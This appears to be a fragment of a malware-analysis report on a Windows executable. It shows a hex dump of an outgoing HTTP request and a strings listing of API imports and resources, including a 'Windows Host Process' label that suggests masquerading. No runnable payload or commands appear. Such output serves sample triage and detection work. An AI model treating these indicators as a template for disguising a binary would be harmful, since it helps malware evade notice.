0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a            n: close....


Strings
.
.
.
040904b0
1036
FileDescription
&Main
MS Sans Serif
PrivateBuild
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
Windows Host Process
)(_0!:
00*Lkq
;`08{<
0H_`|tcbj
'1hKj@
	(2m?c
2X{$3f
??2@YAPAXI@Z
3G@1<t
3oEEEh
??3@YAXPAX@Z
#4J+<,I7
51d3T?
6SP}7U
~7]WuC
7w{y.Jy
|*9IX0l
9n:9}(;2
9V(y_Zh
A0@>wsmP
ADVAPI32.dll
_amsg_exit
CallNtPowerInformation
CertEnumSystemStoreLocation
_cexit
CheckDlgButton
CloseHandle
CloseThemeData
CoCreateInstance
CoInitializeEx
CommandLineToArgvW
_controlfp
CoTaskMemFree
CreateFontIndirectW
CreateSolidBrush
CreateThread
CreateWindowExW
CRYPT32.dll
CryptEncodeObject
CryptEncodeObjectEx
cXAxC|
@.data
DefWindowProcW
DeleteCriticalSection
DeleteObject
DestroyWindow
DialogBoxParamW
DispatchMessageW
"dQWg9
	du|# :Bc
Eb(&P)
EnableWindow
EndDialog
EnterCriticalSection
&#EVw,
ExitProcess
FindResourceW
FindWindowExW
FindWindowW
FreeResource
f .wYf9
GDI32.dll
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDlgCtrlID
GetDlgItem
GetLastError
GetMessageW
GetModuleHandleA
GetParent
GetProcessVersion
GetStartupInfoW
GetSysColor
GetSysColorBrush
GetSystemTimeAsFileTime
GetThemeColor
GetThemeFont
GetTickCount
GetTraceEnableFlags
GetTraceEnableLevel
GetTraceLoggerHandle
GetWindowLongW
GetWindowTextLengthW
GetWindowTextW
GF\C}#
GlobalAlloc
gPL^48
HIt>^W
hPh}L@
hQh#d@
hyVg1	
"I-&#_
I-nIM$
InitializeCriticalSection
_initterm
InterlockedCompareExchange
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
iphj@h*B@
IsDlgButtonChecked
jphdR@
J^P~uw
J?w5*Dw^W
K5cz^x6
K6ZkyS
KERNEL32.dll
KillTimer
l0]yfXs
l	4RoP4
LeaveCriticalSection
LoadIconW
LoadResource
LoadStringW
LocalAlloc
LocalFree
LockResource
L*+\s$
memset
M:G{`&
M(hJC@
msvcrt.dll
n* 8P 
@N!P><
|/n]q1"n*s
nR	u^A
oc[_Dl
OGdUde
ole32.dll
OpenThemeData
__p__commode
__p__fmode
PostMessageW
PostQuitMessage
POWRPROF.dll
/PPP<r
)P|ruc
&'= P)%X
QNXu6i
QueryPerformanceCounter
`.rdata
RegCloseKey
RegCreateKeyExW
RegCreateKeyW
RegisterClassExW
RegisterDeviceNotificationW
RegisterTraceGuidsW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
rIgb<lQo
r{l=9s
>rT\!yh
;r)Wt=Q
...ryv
S4Vhj@h
SendDlgItemMessageW
SendMessageW
SetActiveWindow
__set_app_type
SetBkColor
SetDlgItemTextW
SetFocus
SetForegroundWindow
SetTextColor
SetTimer
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiDestroyDeviceInfoList
SetupDiEnumDeviceInterfaces
SetupDiGetClassDevsExW
__setusermatherr
SetWindowLongW
SetWindowTextW
SHELL32.dll
ShellExecuteExW
ShowWindow
.s(%lD
#&sMly
T9ZP.@
tcx@'d
TerminateProcess
?terminate@@YAXXZ
!This program cannot be run in DOS mode.
ThlFre
ThLoad
ThLoca
Throte
}ThualP
TraceMessage
TranslateMessage
ttt+Lq-
~~]_?u
U	^bs5B
UnhandledExceptionFilter
UnregisterClassW
UnregisterDeviceNotification
UnregisterTraceGuids
URP-PPz
USER32.dll
UxTheme.dll
v2<Yo>e
+]V-^j
_vsnwprintf
(;W5PL
WaitForSingleObject
_wcmdln
_wcsicmp
wcstoul
__wgetmainargs
WideCharToMultiByte
WTSAPI32.dll
WTSRegisterSessionNotification
WTSUnRegisterSessionNotification
x393R%
_XcptFilter
XM5kM~
Xm)tmX
yw;wS 
YwZYQw
><Yy\t
zU>~BF
ZzT	51